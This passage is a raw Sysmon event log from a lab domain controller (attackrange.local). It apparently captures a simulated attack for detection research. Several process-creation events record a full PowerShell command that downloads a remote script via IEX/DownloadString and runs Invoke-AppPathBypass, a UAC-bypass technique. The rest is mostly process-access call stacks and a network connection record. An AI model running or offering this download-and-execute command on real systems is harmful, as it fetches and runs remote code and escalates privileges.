10341000x80000000000000002203487Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.190{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203486Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.190{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203485Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.190{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203484Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.190{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203483Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.190{5ABCFE62-99F1-603E-7907-00000000AD01}30803060C:\Windows\system32\csrss.exe{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203482Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.190{5ABCFE62-E9C2-6040-4A4E-00000000AD01}58085416C:\Windows\system32\cmd.exe{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203481Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.197{5ABCFE62-E9C2-6040-4B4E-00000000AD01}4764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-E9C2-6040-4A4E-00000000AD01}5808C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"" 10341000x80000000000000002203480Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.190{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9C2-6040-4A4E-00000000AD01}5808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203479Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.174{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C2-6040-4A4E-00000000AD01}5808C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002203478Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.174{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203477Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.174{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203476Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.174{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203475Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.174{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203474Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.174{5ABCFE62-99F1-603E-7907-00000000AD01}3080348C:\Windows\system32\csrss.exe{5ABCFE62-E9C2-6040-4A4E-00000000AD01}5808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203473Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.174{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C2-6040-4A4E-00000000AD01}5808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002203472Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.186{5ABCFE62-E9C2-6040-4A4E-00000000AD01}5808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002203471Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.174{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002203470Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.174{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 23542300x80000000000000002203469Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.112{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C852BB0A72EFA16700B011553F7351C,SHA256=8044F2790C033BDBF3AA8F4050261818FA4D358A6E8841A0D94951CFEE3A83CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203468Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.049{5ABCFE62-E9BF-6040-484E-00000000AD01}6020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203467Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:56.790{00000000-0000-0000-0000-000000000000}5828<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local60707-false104.23.99.190-80http 10341000x80000000000000002203624Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.893{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203623Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.893{5ABCFE62-99F4-603E-8807-00000000AD01}6441640C:\Windows\system32\taskhostw.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203622Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.893{5ABCFE62-99F4-603E-8807-00000000AD01}6441640C:\Windows\system32\taskhostw.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203621Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.893{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203620Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.893{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203619Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.877{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203618Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.877{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203617Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL